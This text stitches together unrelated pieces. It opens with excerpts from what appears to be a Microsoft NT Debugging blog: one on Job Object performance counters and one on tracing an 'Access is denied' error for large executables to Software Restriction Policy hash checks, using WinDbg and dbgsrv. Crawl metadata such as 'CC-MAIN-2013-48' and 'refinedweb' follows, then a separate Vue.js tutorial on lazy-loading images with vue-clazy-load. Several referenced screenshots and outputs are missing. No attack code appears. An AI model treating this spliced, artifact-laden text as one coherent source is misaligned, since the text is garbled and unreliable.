There could be different reason for which a system administrator needs to gather information about the resource usage by a particular Process. One of them could be to meet Service Level Agreement. In that case we can monitor individual processes running on the server with the counters available under “Performance Object -> Process”.
Equipped with the knowledge that querying Performance Data for Job Object may result in excessive CPU usage on the server, an Administrator should evaluate or consult the application owner (If needed) to understand whether they really want to gather this performance data.
The following documents are available for application developers to assist with the creation of application specific namespaces. Creation of a private namespace and creating objects under that namespace would ensure that application specific objects are not exposed to the Performance Library because they won’t appear under \BaseNamedObjects namespace.
Object Namespaces
CreatePrivateNamespace Function
Job Objects
CreateJobObjects Function
This problem would be predominantly noticed on older systems. To mitigate it to a certain extent, Windows Vista (and all post operating systems) have a per-session BaseNamedObjects namespace (i.e., it application-specific objects will be created under namespace in the following form \Sessions\<SessionID>\BaseNamedObjects). Hence these objects will not be exposed to the Performance Libraries and will not be available to query via Performance Monitoring Tools. Unfortunately the changes which were done to the kernel to make this work are too intricate to be back-ported to Windows 2003 SP2.
This brings me to the end of this post, I hope this information gives you better insight on the how oversight in an applications design can lead to the breaking of some other components at a later stage.
Recently I received a debugging request for a customer having problems running large executables. On their systems, they could run most EXEs without any problems, but they had two programs that were over 1.8 GB which, when run, would display the following error:
If they tried to run them in a command prompt, they received the message “Access is denied.” Both attempts were made with an administrator account and in neither case were the processes created. Through testing, they found that the programs worked if they were scheduled to run as System and also worked when run in safe mode as an administrator.
When the case was brought to my attention, it was noted that when the failing executables were run, the following appeared in process monitor logs:
The engineer did not see this when one of the problematic EXEs was run (successfully) on his test machine. The customer provided a VM image of their system which we set up in HyperV with a named pipe kernel debugger. I then started kernel debugging to find the cause of the INVALID PARAMETER error, hoping that resolving it would fix the issue.
To start, I looked at the call stack within process monitor for the invalid parameter:
The problem is this isn’t exactly where we return invalid parameter. Looking at the source code for Fltmgr, it doesn’t return invalid parameter – this was just where the error was caught in procmon. This call stack did provide some ideas for good starting places to debug, however. First, I looked up the hex value for STATUS_INVALID_PARAMETER in ntstatus.h – 0xC000000D. Knowing this, I decided to set a breakpoint on nt!IofCallDriver and ran the program. Once the debugger broke in, I planned to use wt -oR. This will trace through the calls displaying the return values next to each call. From there, I would just need to find 0xC000000D on the return column. Unfortunately, what I had forgotten was wt does not display return codes in kernel debugging, only when debugging user mode.
With wt not an option, I decided to use a combination of debugger commands to approximate the output of wt. I knew the return value I was looking for, and I was also confident that I would find that code in the EAX register after the problem occurred. As such, I needed to write a loop that would walk through the instructions until it found 0xC000000D in EAX. The debugger provides two main options for walking instructions: p and t. p (Step) will execute a single instruction and display the register values. If the instruction is a call, it will not enter that function, but just display the results after that subroutine has been executed. t (Trace) also executes a single instruction, but it will enter into the function and will display each instruction.
In this case I wanted trace so I could see which function was returning the invalid parameter status. Tracing though that many instructions/functions would take a long time, but there are some variations on t (and p) that can help. tc (or pc)will execute instructions until a call statement is reached, where it will break and show the register values. tt (or pt) will execute instructions until a return instruction is reached. tct (or pct) will run until either a call or return is reached. In this case, I opted for tct.
Knowing that I would use tct, I had to find a way to execute tct statements until EAX was the value I was looking for. This can be accomplished with the z (While) debugger command. The syntax is pretty easy, it’s just z(expression) and it works just like a do-while loop. Putting it all together, I used this command in the debugger:
tct; z(eax!=0xc000000d)
I then waited for the debugger to break in so I could see where this status was being thrown. Regrettably, the code called ended up going in to some recursion which made my while loop take way too long. To resolve this, I set a new breakpoint just before we entered the recursion, reran the program, used p to step past the call then ran the tct loop.
This time I was quickly brought to the code I was looking for. As soon as it broke in, I ran k to view the callstack:
kd> k
kd> k
If we look at the assembly around Ntfs!NtfsCommonDeviceControl+0x40, we see that only if our return from NtfsDecodeFileObject is not equal to 4 it would move 0xC000000D in to esi, and then move esi to eax, :
I looked at the source code for these functions, and it didn’t make sense that a failure here would cause the problems we were seeing; especially specific to large executables. Out of curiosity I ran notepad on the VM again with procmon and found that it too displayed INVALID PARAMETER, but the program started and ran correctly:
Since this wasn’t the problem, I stopped reviewing the code and decided on a new approach. We knew that when running the EXE in a command prompt we received an “Access is denied message”. At that point it made sense to switch to user mode debugging and take a look at the cmd.exe process that was trying to launch install.exe
Doing user mode debugging in a VM can be a bit of a challenge, especially if you are trying to minimize changes to the VM (and in my case, avoid putting any symbols on the customer’s VM image). Since I already had a kernel debugger attached, one option would be to run ntsd.exe (debugger provided in the Debugging Tools for Windows) on the VM with the -p switch specifying the PID of the cmd.exe process I wanted to debug and -d switch which forwards the i/o of ntsd to the kernel debugger. The problem with this approach is the kernel debugger just becomes a front end for issuing commands and seeing the output from ntsd. That means all symbol resolution is still done on the target system running ntsd.
I didn’t want to give the customer VM Internet or corporate network access, so I instead opted to run dbgsrv.exe on the VM. Running “dbgsrv -t tcp:port=9999” tells the debug server to listen on TCP port 9999 for debugger connections. Then, on the HyperV server computer I could just run windbg -premote tcp:server=(IP of VM),port=9999 -p (PID of cmd on VM) to debug it.
I suspected that we may be calling CreateProcess but it was failing, so I set a breakpoint on kernel32!CreateProcessW. Sure enough, it hit when I tried to run install.exe in the command prompt:
This time I could use wt -oR since this was a usermode debug. Looking in ntstatus.h again, the code for STATUS_ACCESS_DENIED is 0xC0000022. Running wt can take a very long time, so I used the -l switch, which limits the number of levels deep it will display. This would be something like using tct as I did above until you were a few calls deep then using pct. Using wt -l 3 -oR gave me the following:
…
Now we are getting close! I set a new breakpoint for kernel32!BasepCheckWinSaferRestrictions and reran the test. This gave me the following line:
63 0 [ 3] ADVAPI32!__CodeAuthzpCheckIdentityHashRules eax = ffffffff`c0000022
63 0 [ 3] ADVAPI32!__CodeAuthzpCheckIdentityHashRules eax = ffffffff`c0000022
One last run with a new breakpoint at ADVAPI32!__CodeAuthzpCheckIdentityHashRules and I found what I was looking for:
58 218 [ 1] ADVAPI32!__CodeAuthzpEnsureMapped eax = ffffffff`c0000022
58 218 [ 1] ADVAPI32!__CodeAuthzpEnsureMapped eax = ffffffff`c0000022
The depth is shown in brackets. As this call was 1 deep from __CodeAuthzpCheckIdentityHashRules and I was using 3 as my maximum depth in wt, I knew this is where the STATUS_ACCESS_DENIED was coming from. I reviewed the source code and found that this is the code that performs Software Restriction Policy checking. Specifically, we are attempting to map the executable into memory to perform hash checking on it. Since there isn’t 1.8 GB of contiguous available memory, it failed. Looking at the VM, I discovered that the customer had implemented a number of software restriction policies. As a test, I removed their restrictions on the VM, and the programs ran successfully. A search of the KB revealed that a hotfix was published for this problem: 973825. Installing the hotfix in the article also resolved the issue with their policies intact.
-Matt Burrough
Hello!:
|
http://blogs.msdn.com/b/ntdebugging/default.aspx?PageIndex=9
|
CC-MAIN-2013-48
|
refinedweb
| 3,388
| 53.1
|
`ortoolpy` is a package for Operations Research.
Project Description
ortoolpy is a package for Operations Research.
from ortoolpy import knapsack size = [21, 11, 15, 9, 34, 25, 41, 52] weight = [22, 12, 16, 10, 35, 26, 42, 53] capacity = 100 knapsack(size, weight, capacity)
Requirements
- Python 3, numpy, pandas, matplotlib, networkx, pulp
Features
- This is a sample. So it may not be efficient.
Setup
$ pip install ortoolpy
History
0.0.1 (2015-6-26)
- first release
Release history Release notifications
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
|
https://pypi.org/project/ortoolpy/
|
CC-MAIN-2018-17
|
refinedweb
| 101
| 57.67
|
There are some amazing utilities available which never seem to get much recognition. One of these in my opinion is Microsoft’s Log Parser; you can download v2.2 from here and find an introduction here. It gives you the ability to use SQL-like queries on common log files. While it is presented as a command line program most of the work is done by the accompanying DLL so would it be possible to access it from Python.
Looking in the Log Parser help file it documents a COM interface which gives us our way in. Before you can use the COM interface you must register the DLL with the following command
regsvr32 LogParser.dll
All the examples are in VBScript unsurprisingly but we can use them with a bit of trial and error. The first item of interest is the name of the COM object, MSUtil.LogQuery. Now we know what to pass to the dispatch method. If you have used a library that confirms to the Python database API think of this as the connect method.
Next comes the two ways of working, batch or interactive. Interactive seems the most natural place to start so we need to use the Execute method. This takes the SQL-like query and optionally the input format. We’ll leave it to guess the input format for this test.
The execute method returns a LogRecordSet. Here is where the VBScript example helps. This is an interface to a set a records (obviously) and allows us to find out the columns and get the records. At a stretch you can think of it as cursor. Putting all this together we can query the System event log to find out all the times the computer was switched on (Event ID 12) with the following code
import win32com.client lp = win32com.client.Dispatch("MSUtil.LogQuery") sql = "SELECT * FROM System WHERE EventID = 12" lrs = lp.Execute(sql) for col in range(rs.getColumnCount()): print col, rs.getColumnName(col)
Now we have the result of query in the record set we need to get at the values. We can get each record sequentially using the record set interface. This returns a LogRecord object which basically just allows you to get each value by specifying the index you want. The example above gives us two columns we could use, I’ll use the TimeGenerated one. So lets display them
# continuing on from above while not lrs.atEnd(): lr = lrs.getRecord() print "Computer started at",lr.getValue(2) lrs.moveNext()
With a working COM interface, I wrote the following program to allow the SQL statements to be run from the command line in an interactive environment. The output formatting is poor but it makes a good example program.
|
https://quackajack.wordpress.com/tag/log-parser/
|
CC-MAIN-2018-47
|
refinedweb
| 460
| 75
|
In the previous lesson on bitwise operators (O.2 -- Bitwise operators), we discussed how the various bitwise operators apply logical operators to each bit within the operands. Now that we understand how they function, let’s take a look at how they’re more commonly used.
Bit masks
In order to manipulate individual bits (e.g. turn them on or off), we need some way to identify the specific bits we want to manipulate. Unfortunately, the bitwise operators don’t know how to work with bit positions. Instead they work with bit masks.
A bit mask is a predefined set of bits that is used to select which specific bits will be modified by subsequent operations.
Consider a real-life case where you want to paint a window frame. If you’re not careful, you risk painting not only the window frame, but also the glass itself. You might buy some masking tape and apply it to the glass and any other parts you don’t want painted. Then when you paint, the masking tape blocks the paint from reaching anything you don’t want painted. In the end, only the non-masked parts (the parts you want painted) get painted..
Because C++14 supports binary literals, defining these bit masks is easy:
Now we have a set of symbolic constants that represents each bit position. We can use these to manipulate the bits (which we’ll show how to do in just a moment).
Defining bit masks 4.13 -- Literals.
This can be a little hard to read. One way to make it easier is to use the left-shift operator to shift a bit into the proper location:
Testing a bit (to see if it is on or off)
Now that we have a set of bit masks, we can use these in conjunction with a bit flag variable to manipulate our bit flags.
To determine if a bit is on or off, we use bitwise AND in conjunction with the bit mask for the appropriate bit:
This prints:
bit 0 is on
bit 1 is off
Setting a bit
To set (turn on) a bit, we use bitwise OR equals (operator |=) in conjunction with the bit mask for the appropriate bit:
bit 1 is off
bit 1 is on
We can also turn on multiple bits at the same time using Bitwise OR:
Resetting a bit
To clear a bit (turn off), we use Bitwise AND and Bitwise NOT together:
bit 2 is on
bit 2 is off
We can turn off multiple bits at the same time:
Flipping a bit
To toggle a bit state, we use Bitwise XOR:
bit 2 is on
bit 2 is off
bit 2 is on
We can flip multiple bits simultaneously:
Bit masks and std::bitset
std::bitset supports the full set of bitwise operators. So even though it’s easier to use the functions (test, set, reset, and flip) to modify individual bits, you can use bitwise operators and bit masks if you want.
Why would you want to? The functions only allow you to modify individual bits. The bitwise operators allow you to modify multiple bits at once.
bit 1 is off
bit 2 is on
bit 1 is on
bit 2 is off
bit 1 is on
bit 2 is on
bit 1 is off
bit 2 is off
Making bit masks meaningful
Naming our bit masks “mask1” or “mask2” tells us what bit is being manipulated, but doesn’t give us any indication of what that bit flag is actually being used for.
A best practice is to give your bit masks useful names as a way to document the meaning of your bit flags. Here’s an example from a game we might write:
Here’s the same example implemented using std::bitset:
Two notes here: First, std::bitset doesn’t have a nice function that allows you to query bits using a bit mask. So if you want to use bit masks rather than positional indexes, you’ll have to use Bitwise AND to query bits. Second, we make use of the any() function, which returns true if any bits are set, and false otherwise to see if the bit we queried remains on or off.
When are bit flags most useful?
Astute readers may note that the above examples don’t actually save any memory. 8 booleans would normally take 8 bytes. But the above examples use 9 bytes (8 bytes to define the bit masks, and 1 bytes for the flag variable)!
Bit flags make the most sense when you have many identical flag variables. For example, in the example above, imagine that instead of having one person (me), you had 100. If you used 8 Booleans per person (one for each possible state), you’d use 800 bytes of memory. With bit flags, you’d use 8 bytes for the bit masks, and 100 bytes for the bit flag variables, for a total of 108 bytes of memory --.
There’s another case where bit flags and bit masks can make sense. argument, a well regarded 3d graphic library, opted to use bit flag parameters instead of many consecutive Boolean parameters.
Here’s a sample function call from OpenGL:
GL_COLOR_BUFFER_BIT and GL_DEPTH_BUFFER_BIT are bit masks defined as follows (in gl2.h):
Bit masks involving multiple bits
Although bit masks often are used to select a single bit, they can also be used to select multiple bits. Lets take a look at a slightly more complicated example where we do this.:.
Summary
Summarizing how to set, clear, toggle, and query bit flags:
To query bit states, we use bitwise AND:
To set bits (turn on), we use bitwise OR:
To clear bits (turn off), we use bitwise AND with bitwise NOT:
To flip bit states, we use bitwise XOR:
Quiz time
Question #1
Do not use std::bitset in this quiz. We’re only using std::bitset for printing.
std::bitset
Given the following program:
a) Write a line of code to set the article as viewed.
Expected output:
00000101
Show Solution
b) Write a line of code to check if the article was deleted.
c) Write a line of code to clear the article as a favorite.
Expected output (Assuming you did quiz (a)):
00000001
1d) Extra credit: why are the following two lines identical?
~(option4 | option5)
~option4 & ~option5
Never mind I can't see.
Can I use enum to define bit masks? Does using enum allow to save memory? Does it have any other weakness?
Hi, Nascardriver and Alex
TBH, I'm quite having a little hard time in understanding this chapter.
Particularly in how the bitmask and bitwise operator work...
I mean, for example, how the (flags & mask) expression can produce true/false state rather than modified binary value, just like what we've learned in previous lesson.
Can you please give me more explanation about that? Because i'm truly stuck on that part.
Thanks so much, man
`flags & mask` returns an integer. Integers are convertible to `bool`. Any non-zero integer is `true`, 0 is `false`.
Yeah, it's already clear for me that (flag & mask) expression returns 1 or 0 value, which is then converted to bool value.
But what i'm asking here is HOW? Because from what i learn in previous lesson (about bitwise operator), if we compare two binary values with AND/OR operator, it should returns / produces new combination of binary value, NOT just a single integer value ( 0 or 1)
Or perhaps am i missing something or understanding these topics wrong way here?
Can you help me please? Thanks before, man
> it's already clear for me that (flag & mask) expression returns 1 or 0
It doesn't, it returns the first value ANDed with the second. The result is 0 if `flags` and `mask` didn't have any bits in common, otherwise the result is non-zero.
Extremely helpful comment, thanks!
Hey guys just needed help again because its getting harder and harder as the chapters move on.
so the way i understand it is that since the smallest size of a variable is 1 byte we make use of the bits in a byte to store 8 Boolean values in 1 variable.
but isn't this also going to use up 1 byte for each mask we create ?
constexpr std::bitset<8> mask0{ 0b0000'0001 }; // represents bit 0 isnt mask0 going to take up 1 byte ?
constexpr std::bitset<8> mask1{ 0b0000'0010 }; // represents bit 1 isnt mask1 going to take up 1 byte too ?
constexpr std::bitset<8> mask2{ 0b0000'0100 }; // represents bit 2
constexpr std::bitset<8> mask3{ 0b0000'1000 }; // represents bit 3
constexpr std::bitset<8> mask4{ 0b0001'0000 }; // represents bit 4
constexpr std::bitset<8> mask5{ 0b0010'0000 }; // represents bit 5
constexpr std::bitset<8> mask6{ 0b0100'0000 }; // represents bit 6
constexpr std::bitset<8> mask7{ 0b1000'0000 }; // represents bit 7 so in total we created 8 variables each a 1 byte variable ?
so if i create a separate 1byte integer type for a single Boolean variable it doesn't make a difference in memory space ?
You can reuse the masks for an infinite amount of flag variables
ah i see.. thanks very much.
although , in an attempt to make our bit mask meaningful we do this
// Define a bunch of physical/emotional states
doesn't this mean that each mask is now specific to a single byte size variable and would now not make sense if used on a second single byte variable with different meanings ?
like say 1 byte variables characterStatus and carStatus ... its now senseless to use isHappy for carStatus..
EDIT : never mind im stupid. all is explained further down below in the "When are bit flags most useful?" section. i just had to read further. sorry
`mask1`, `mask2`, etc. are meaningless and shouldn't occur in the wild. `isHungry` etc. is a real example.
You can't mix `characterStatus` and `carStatus`. But you might have more than 1 character or more than 1 car.
Even if you only have 1 character or 1 car, you'll save memory when you need to serialize the value, eg. when sending the value over the network or writing it to a file.
If you know that you'll only have 1 of these values and you'll never need to serialize it in a memory-friendly way, using a `bool` for each option is the easier solution.
Never mind I'm stupid, you already found it. I just had to read further :D
thanks ! haha :D
May I suggest to remove the std::cout << std::hex; line from the RGBA example?
I think it's redundant to show the result in hex, since thats exactly what we input in first place. It's a lot more interesting to show the unsigned integer of each color:
FF7F3300 is composed of:
255 red
127 green
51 blue
0 alpha
Another great lesson!
1. Line 17 in the code block in section "Making bit masks meaningful":
>
`isHappy | isLaughing` should be between parentheses for consistency with previous examples. Same goes for line 18 in the next code block.
2. In section "When are bit flags most useful?"
> you have to remember which parameters corresponds to which option
I think "correspond" should be used instead, but I'm not 100% sure.
3. Question #1
> Do not use std::bitset in this quiz. We’re only using std::bitset to for printing.
I don't think "to" should be here.
Visual Studio tip:
Hold Ctrl + Alt and click somewhere to create a new cursor/caret. This will let you make edits in multiple places at once. Useful for creating bitmask const variables with binary literals.
Can you explain how this code works?
Pixel is a 32 bit variable where the user has inserted some value. Variables redBits, greenBits, blueBits and alphaBits are 8-bit bit masks that are used to select specific bits from pixel. When we say e.g pixel & redBits, we choose the last 8 bits of the variable named pixel, because those are what the mask redBits corresponds for. The sifting operation >> is done, because we need the bits to be in the rightmost positions of the unsigned integers so that we can represent them as hexadecimal values correctly, so the leftmost 8 bits on positions 24-31 are sifted 24 steps to the right etc. Otherwise after the & operation we would have FF000000, which is not what we wanted.
Hello! Could you please explain following example in a little bit more details as i am getting confused at some parts. I will list what i need additional support with below the example.
1. How would you brace initialize RGBA variables using static cast? Just one example on "red" and why you want to avoid using static cast? More complicated?
2. You are using std::hex to print values in hex at the end and using static cast <int> as well. Could you explain why exactly we have to use static cast <int> to display RGBA variables? Is it because these values are currently set in binary? But even though they are in binary, why i cannot just use std::cout<<std::hex and then std::cout<<red<<"red\n"? Doing so i am expecting binary "red" to be automatically converted to hex "red" because i am using std::cout<<std::hex prior to print "red" variable. Am i am missing something from lessons about conversion and printing values in different numerical systems?
Thanks for the answer in advance
1. Neither `auto` nor `static_cast` were fully introduced yet, that's probably why the `static_cast` was avoided here. I've updated the example to use the `static_cast` anyway, because it's used elsewhere too, even though the code gets messy without `auto`.
2. The variables being printed are `std::uint_fast8_t`, which might be an `unsigned char`. If that's the case, `std::cout` would interpret them as characters, not numbers. The numbering system you use doesn't affect the value. Numbering systems are merely an aid for humans. For a computer, everything is binary. Saying "a value is set in binary" doesn't make sense.
Many thanks, it is all clear now!
Is it fine to write this line of code below for question #1 b) ?
(myArticleFlags & option_deleted) ? (std::cout << "The article has been deleted.") : (std::cout << "The article has not been deleted.");
The conditional operator should only be used if you need the return value of the expressions. If you don't need the return value, use an if-statement.
1. any()
Is there an explaination for it? It just pops up out of the blue at the end of the example.
2. For Question 1a)
Could you kindly show what the output is in the console?
With your code, I got a smiley face. ☺☺☺
With my code, I got a 1.
1. The explanation is in the paragraph after the example.
2. The output is implementation-defined, because `std::uint_fast8_t` is an implementation-defined type. If `std::uint_fast8_t` is an `unsigned char`, the output should be a SOH (Start of Heading) character (invisible). If it is another integer type, the output should be 1. I don't know how you managed to get a smiley face. If your `std::uint_fast8_t` is an `unsigned char`, `(myArticleFlags | option_viewed)` promotes the result to an `int` or `unsigned int`, which is why you can get different results compared to printing `myArticleFlags`.
Hi, do you have an email?
I'll snapshot the smileyface and email it to you.
I assume the answer should be 0x01.
Could you print out the answer and add it to Quiz 1a)?
I'm not sure if I'm doing it correctly if I see a smiley face appear as the answer.
Seeing the smiley won't help me. The smiley you posted is "\u263a", very much not what the value of `myArticleFlags` should be. If you want to print the value as an integer, you can use `std::cout << static_cast(myArticleFlags) << '\n';`.
I've added expected outputs to quiz (a) and (c), thanks for the suggestion!
Hello!
May i ask why in all your examples you use uint_fast8_t, while in previous lessons it was shown as the best practice to avoid using 8 bit integers since C++ may consider them as chars?
You said:
"We use 0s to mask out the bits we don’t care about, and 1s to denote the bits we want modified."
Where do you use 0s in this lesson to "mask out" bits and 1s to "denote bits"? And how does 0s and 1s mask out or in bits?
You said that "cstdint" probably stands for "standard integer" that’s what I knew but what I don’t know is what does the "c" stand for?
means that we include the C++ version "..." library
Thus,
means we include the C++ version of stdint.h library
Cannot reply to comments, also there’s no timer to edit a comment.
How does flags "|= mask1" turn on a bit?
"standard integer" probably.
There are many `flags` on this page. The `flags` in "Summary" assumes there is a `flags` bitset or integer, it doesn't matter.
I don't know what the "c" stands for. It might mean that the header originates from C. eg. cstdint is stdint.h in C.
Can you explain How flags "|= mask1" turns on a bit?
`flags |= mask1` is the same as `flags = flags | mask1`
How does "flags = flags | mask1" torn on a bit?
turn*
See lesson O.2 section "Bitwise OR"
I know what bitwise or is and that’s why I’m asking why is it needed an or why not "flags = mask1" ? so it declares flags as mask1 that is on.
`flags = mask1` would override all bits, but you want to set those bits to 1 that are 1 in `mask1` and not touch the others
I don’t get it. What does flags bitwise or equals mask1 mean? More precise: What does or equals mean?
It's like
which means:
so
is the same as
[code]flags = flags | mask1[code]
I suggest you to go at the section "Bitwise assignment operators" of the previous lesson (O.2)
I’m stuck here, can you reply?
I don't know what more to say. I suggest you move on to other lessons and come back to bitwise operations when you need them.
Let me try to explain this how I understood it.
Let's say
flags = 0101
mask = 0010
flags |= mask is the same as flags = flags|mask
To visualize the procedure like it was done in previous lessons, we can show it like this:
0101 (flags)
OR 0010 (masks)
--------
0111 (new flags)
So the second bit from the right was turned on using the mask.
How is flags |= mask1 the same as flags | mask1 ? = is a assignment and how is flags | assigned to mask1 like flags | mask1 ?
Why is it needed an | (or) to assign flags to mask1 why is it not just flags = mask1?
Because the "=" means assignment which means:
for example:
and
if we do:
The variable "flags" would be 0b0000'0010
whereas if we do:
which means
It assigns the "flags bitOR mask1" to the variable flags which means flags = 0b0000'0101 | 0b0000'0010
What does "cstdint" stand for?
And where was flags defined?
We use hexadecimal values only because inputting binary values for all the 32 bits is time elapsing. Right?
I have a doubt. Maybe it's silly. In the program which asks the user to enter a 32-bit hexadecimal value, and then extracts the 8-bit color values for R, G, B, and A, we assign 0xFF000000 to the red extractor. When the user enters a value, he/she enters a value of 8 bit long. I don't understand this. We are defining 32bit long value and inputting and operating using 8 bit long values.
The user enters 0xFF000000, which is a 32bit value. The program splits this 32bit value into 4 8bit values.
You mean, the limit for the data type is 32 bits? How's FF000000 32 bit value??? It's 8 bits isn't it?
FF is the largest 8bit value. Anything beyond FF doesn't fit into 8 bits.
FF000000 is a 32bit value.
Maybe you're being confused by the trailing zeros. hex(FF000000) is dec(4278190080).
Oh yeah yeah. It's all clear now. Thank you for helping me understand. And I am amazed by the way you keep this website updated and answer every questions asked. May God bless you and your team. Keep helping others✌
Masktape is not the appropriate example to bitmask because it’s the opposite, masking against paint is for the cause to exclude the masked part but with bitmask it’s the cause of using only that bit and excluding all other bits.
thanks
when i finshed the last lesson i did some functions to do set,reset,test,flip
before i know about bit masks
i want to know are my functions is usable or not ?
sorry for bad english
here is my code :
#include <iostream>
#include <bitset>
#define typeOfNumber unsigned char // type of bitflags(should be unisgned integer)
constexpr char numberOfBits{ 8 }; // should identical with the type above
// to give me the position (i didn't now about the bit masks yet)
int expontaion(int value, int exponent) {
int theResult{ 1 };
for (;exponent > 0;exponent--) {
theResult *= value;
}
return theResult;
}
// set bit to 1
void setBit(typeOfNumber & bitFlags, typeOfNumber position)
{
position = expontaion(2, position);
bitFlags = bitFlags | position;
}
// set bit to 0
void reSetBit(typeOfNumber& bitFlags, typeOfNumber position)
{
position = expontaion(2, position);
if ((bitFlags & position) == position)
bitFlags ^= position;
}
// if bit is 0 set it to 1 (vice versa)
void flipBit(typeOfNumber& bitFlags, unsigned typeOfNumber position)
{
position = expontaion(2, position);
bitFlags = bitFlags ^ position;
}
//test bit
typeOfNumber getBit(typeOfNumber bitFlags, typeOfNumber position)
{
bitFlags = bitFlags << (numberOfBits - 1) - position;
bitFlags = bitFlags >>( numberOfBits - 1);
return bitFlags;
}
int main() {
unsigned char infoBitFlags{0b1010'1010};
setBit(infoBitFlags, 0); // set position 1 in infoBitFlags to 1
std::cout << std::bitset<8>{infoBitFlags} << '\n'; //this will print 1010'1011
return 0;
}
I don't know what it particularly is but, it feels like I didn't understand something. I even read these chapters a couple of times, thoroughly too, but it still feels like I am not completely sure about it. It might have to do with bits and bytes and values, I don't know. Due to this I have not been able to proceed further...
lmao same
Try subbing in the values and test it out. For example if we test if mask1 is turned on. We can do (flag & mask1)
Subbing in we get:
0000'0101 &
0000'0010
---------
0000'0000
Remember that for '&', both bytes have to be true (1). Since all the whole byte is false(they are all 0), we can say that mask1 is turned off.
You may notice the bytes that are turned on have at least 1 true bit for flag & masknumber.
So when we are turning on a bit, we use OR '|', which means at least one or more bit have to be true(1). This guarentees that at least one of the bytes will have a 1, for example:
flag |= mask1 =
0000'0101 OR
0000'0010
---------
0000'0111 As there is more than one true bit, mask1 is turned on.
Now lets see what we get when we turn off a bit.
From the first example above, we are told that mask2 = 0000'0100 is turned on.
We can turn it off with flag &= ~mask2. Let's see how it works:
~mask2 = 1111'1011.
flag = flag & ~mask2 is:
0000'0101 AND
1111'1011
---------
0000'0000
Since all the bits are 0, we say that mask2 is turned off now.
I might be completely wrong, but this is the way I understood this chapter. Please correct me if I'm wrong in anything.
Hi there, awesome series of lessons you've all got going here, really appreciate the effort that goes into maintaining a site like this, kudos!
I have a question regarding the final example before the summary. As far as I can tell, my code is identical to that provided in the example;
However I keep receiving a compiler warning telling me my green RGBA component variable in main() is being initialized with a 'possible loss of data', implying that the data lost are the zeros resulting from the 16 right bitshifts of (green & greenMask), even though the other component variables all compile with no issue at all. I had to disable treating warnings as errors in order for my program to compile. Suffice to say that it works fine, so I'm just wondering why I am receiving the aforementioned warning? Thanks in advance.
Why are we not using binary numbers here, but a left shift? And how the value of 1 is evaluated.
#include <iostream>
#include <cstdint>
#include <bitset>
int main()
{
constexpr std::uint_fast8_t option1{ 0b0000'0000 };
constexpr std::uint_fast8_t option2{ 0b0000'0001 };
constexpr std::uint_fast8_t option3{ 0b0000'0010 };
constexpr std::uint_fast8_t option4{ 0b0000'0100 };
constexpr std::uint_fast8_t option5{ 0b0000'1000 };
constexpr std::uint_fast8_t option6{ 0b0001'0000 };
constexpr std::uint_fast8_t option7{ 0b0010'0000 };
constexpr std::uint_fast8_t option8{ 0b0100'0000 };
std::uint_fast8_t bitflag{ };
/* constexpr std::bitset<8> option1{ 0b0000'0000};
constexpr std::bitset<8> option2{ 0b0000'0001 };
constexpr std::bitset<8> option3{ 0b0000'0010 };
constexpr std::bitset<8> option4{ 0b0000'0100 };
constexpr std::bitset<8> option5{ 0b0000'1000 };
constexpr std::bitset<8> option6{ 0b0001'0000 };
constexpr std::bitset<8> option7{ 0b0010'0000 };
constexpr std::bitset<8> option8{ 0b0100'0000 };
std::bitset<8> bitflag{};*/ (this one can print out binary number)
bitflag |= option7;
std::cout << bitflag;
return 0;
}
When i had used uint_fast8_t, it had printed nothing. But, if i had used bitset, it had printed out the binary number. Can i known why it had been like that, what is my problem make it can not print out if i used uint_fast8_t (for the information, the compiler does not show any warning or error)
`std::uint_fast8_t` might be an `unsigned char`. `std::cout <<` treats `char` as characters. Add a cast to `int`.
when i used std::uint_fast16_t, it can print out 32. What should i do if i want to print out on binary (0010'0000), not on decimal (32)? If i used static_cast<int>(bitflag), it will going to print out decimal too. Should i make a function for let it print out binary number?
Either write a function to print binary or cast `bitflag` to a `std::bitset`.
Name (required)
Website
Save my name, email, and website in this browser for the next time I comment.
|
https://www.learncpp.com/cpp-tutorial/bit-manipulation-with-bitwise-operators-and-bit-masks/
|
CC-MAIN-2021-17
|
refinedweb
| 4,464
| 71.44
|
Images are a fun part of web development. They look great, and are incredibly important in almost every app or site, but they’re huge and slow. A common technique of late is that of lazy-loading images when they enter the viewport. That saves a lot of time loading your app, and only loads the images you need to see. There are a number of lazy-loading solutions for Vue.js, but my personal favorite at the moment is vue-clazy-load.
It’s basically a dead-simple wrapper with slots that allows you do display a custom image and a custom placeholder. There’s not much else, but it’s incredibly flexible.
📚 Recommended courses ⤵Black Friday: Top notch Vue.js courses and over 200 lessons for $58 per year - Vue School
Installation
Install vue-clazy-load in your Vue.js project.
# Yarn $ yarn add vue-clazy-load # NPM $ npm install vue-clazy-load --save
main.js (Partial)
import Vue from 'vue'; import App from 'App.vue'; import VueClazyLoad from 'vue-clazy-load'; ... Vue.use(VueClazyLoad); ... new Vue({ el: '#app', render: h => h(App) });
Since vue-clazy-load uses the brand-new IntersectionObserver API, you’ll probably want a polyfill to support it in most browsers. This one works well, but any polyfill that provides the IntersectionObserver API should work.
<script src=""></script>
Usage
Now you can use the <clazy-load><clazy-load> component directly, as shown below.
App.vue
<template> <div id="app"> <!-- The src allows the clazy-load component to know when to display the image. --> <clazy-load <!-- The image slot renders after the image loads. --> <img src=""> <!-- The placeholder slot displays while the image is loading. --> <div slot="placeholder"> <!-- You can put any component you want in here. --> Loading.... </div> </clazy-load> </div> </template>
This will get you a basic div that starts loading once the element enters the viewport, displays Loading… until the image loads, then displays the image. Nice and simple!
There are, of course a few props you can pass:
- src: String (required) - The src of the image to load.
- tag: String - Which component / element clazy-load will render as. (The default is a boring ‘ol div.)
- element: String - Which element to consider as the viewport. Otherwise the browser viewport is used. (Useful if you have a custom scrolling area.)
- threshold: Array<Number> || Number - How far into the viewing area the clazy-load component needs to be before the load is started. See MDN for more details.
- margin: String - A value for the margin that gets applied to the intersection observer.
- ratio: Number - A value between 0 and 1 that corresponds to the percentage of the element that should be in the viewport before loading happens.
- crossorigin: “anonymous” or “use-credentials” - An option to help work with CORS for images hosted on a different domain.
- loadedClass: String, loadingClass: String & errorClass: String - Class name to give to the root element for the different states.
There’s also a single event provided, the load event. Which is, as the name implies, emitted when the image finished loading.
Also of note, you can effectively use any components in the slots, including Vue transition components, as shown below:
<template> <div id="app"> <!-- Boom: Free fade transitions. --> <clazy-load <transition name="fade"> <img src=""> </transition> <transition name="fade" slot="placeholder"> <div slot="placeholder"> Loading.... </div> </transition> </clazy-load> </div> </template> <style> .fade-enter, .fade-leave-to { opacity: 0; } </style>
